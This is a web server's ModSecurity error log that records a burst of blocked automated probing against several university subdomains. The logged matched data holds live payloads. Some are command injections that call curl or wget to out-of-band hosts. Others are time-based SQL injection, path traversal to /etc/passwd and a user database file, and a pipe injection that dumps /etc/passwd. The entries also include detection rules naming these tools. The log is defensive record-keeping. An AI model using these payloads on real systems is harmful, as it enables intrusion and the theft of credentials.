[Tue Aug 29 11:33:18.355165 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgdgjer8yo9t84c.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARo8wkAAAAT"]
[Tue Aug 29 11:33:18.380193 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlgpsdjysumdmhmx.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARo8woAAAAT"]
[Tue Aug 29 11:33:18.681424 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgtqkamh7rrsgpt.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOjoAAAAs"]
[Tue Aug 29 11:33:18.701327 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg7jdomdnxfipno.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOjsAAAAs"]
[Tue Aug 29 11:33:18.716668 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlge8gd6d7jwzqaj.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmH0AAAAR"]
[Tue Aug 29 11:33:18.720370 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg8ou8zgd35d67k.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAAQKOjwAAAAs"]
[Tue Aug 29 11:33:18.735320 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlg83ogmpyd974wn.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARdiHsAAAAK"]
[Tue Aug 29 11:33:18.779613 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:macAddress. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:macAddress: 112233445566;wget http:/cjmn8l5jmimk2adbbnlgzrohb95qs1rpx.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/boardDataWW.php"] [unique_id "ZO11DsCo-f0AAARnmIAAAAAR"]
[Tue Aug 29 11:33:18.909199 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgwoAAAAU"]
[Tue Aug 29 11:33:18.929571 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgwsAAAAU"]
[Tue Aug 29 11:33:18.949116 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARpgwwAAAAU"]
[Tue Aug 29 11:33:18.965968 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARQ38UAAAAB"]
[Tue Aug 29 11:33:18.999939 2023] [:error] [pid 1136] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11DsCo-f0AAARwuq4AAAAZ"]
[Tue Aug 29 11:33:19.000525 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:jk. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:jk: pyimport os;os.system(\\x22curl cjmn8l5jmimk2adbbnlg54r7wpwbonf9g.oast.site\\x22);f=function f2(){};"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/flash/addcrypted2"] [unique_id "ZO11DsCo-f0AAARv7O8AAAAY"]
[Tue Aug 29 11:33:19.009048 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARpgw8AAAAU"]
[Tue Aug 29 11:33:19.028138 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARpgxAAAAAU"]
[Tue Aug 29 11:33:19.047739 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARxOpYAAAAa"]
[Tue Aug 29 11:33:19.048093 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARQ38kAAAAB"]
[Tue Aug 29 11:33:19.051574 2023] [:error] [pid 1142] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAAR2Z2sAAAAe"]
[Tue Aug 29 11:33:19.056500 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:target. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: //..//..//..//..//..//../ found within ARGS:target: l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/elfinder/php/connector.minimal.php"] [unique_id "ZO11D8Co-f0AAARzXwQAAAAd"]
[Tue Aug 29 11:33:19.060975 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:id: 12 AND (SELECT 5023 FROM (SELECT(SLEEP(6)))Fvrh)-- VoFu"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11D8Co-f0AAARt-8EAAAAV"]
[Tue Aug 29 11:33:19.070940 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARQ38oAAAAB"]
[Tue Aug 29 11:33:19.302886 2023] [:error] [pid 1119] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARfwjIAAAAI"]
[Tue Aug 29 11:33:19.316857 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARxOpkAAAAa"]
[Tue Aug 29 11:33:19.319722 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARpgxMAAAAU"]
[Tue Aug 29 11:33:19.321093 2023] [:error] [pid 1139] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARzXwcAAAAd"]
[Tue Aug 29 11:33:19.322220 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARt-8MAAAAV"]
[Tue Aug 29 11:33:19.323639 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARTENUAAAAG"]
[Tue Aug 29 11:33:19.338633 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARxOpoAAAAa"]
[Tue Aug 29 11:33:19.341109 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARt-8QAAAAV"]
[Tue Aug 29 11:33:19.343791 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:ip. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: >../../ found within ARGS:ip: 127.0.0.1|cat /etc/passwd>../../2UdxkKVwy9OqHqptk3OiMdsqI1X.txt"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/manager/radius/server_ping.php"] [unique_id "ZO11D8Co-f0AAARTENYAAAAG"]
[Tue Aug 29 11:33:19.356832 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11D8Co-f0AAARA7fQAAAAA"]
[Tue Aug 29 11:33:20.318434 2023] [:error] [pid 1134] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: md5( found within ARGS:order: id;select(md5(999999999))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/api/experimental/patternfile"] [unique_id "ZO11EMCo-f0AAARu2qsAAAAW"]
[Tue Aug 29 11:33:20.323455 2023] [:error] [pid 1127] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARnmIUAAAAR"]
[Tue Aug 29 11:33:20.330840 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../// found within ARGS:fname: ../../../../../../..///config/MPXnode/www/appConfig/userDB.json"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAANsAd4AAAAD"]
[Tue Aug 29 11:33:20.331024 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../..// found within ARGS:fname: ../../../../../../..//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/logs/downloadMainLog"] [unique_id "ZO11EMCo-f0AAARxOp4AAAAa"]
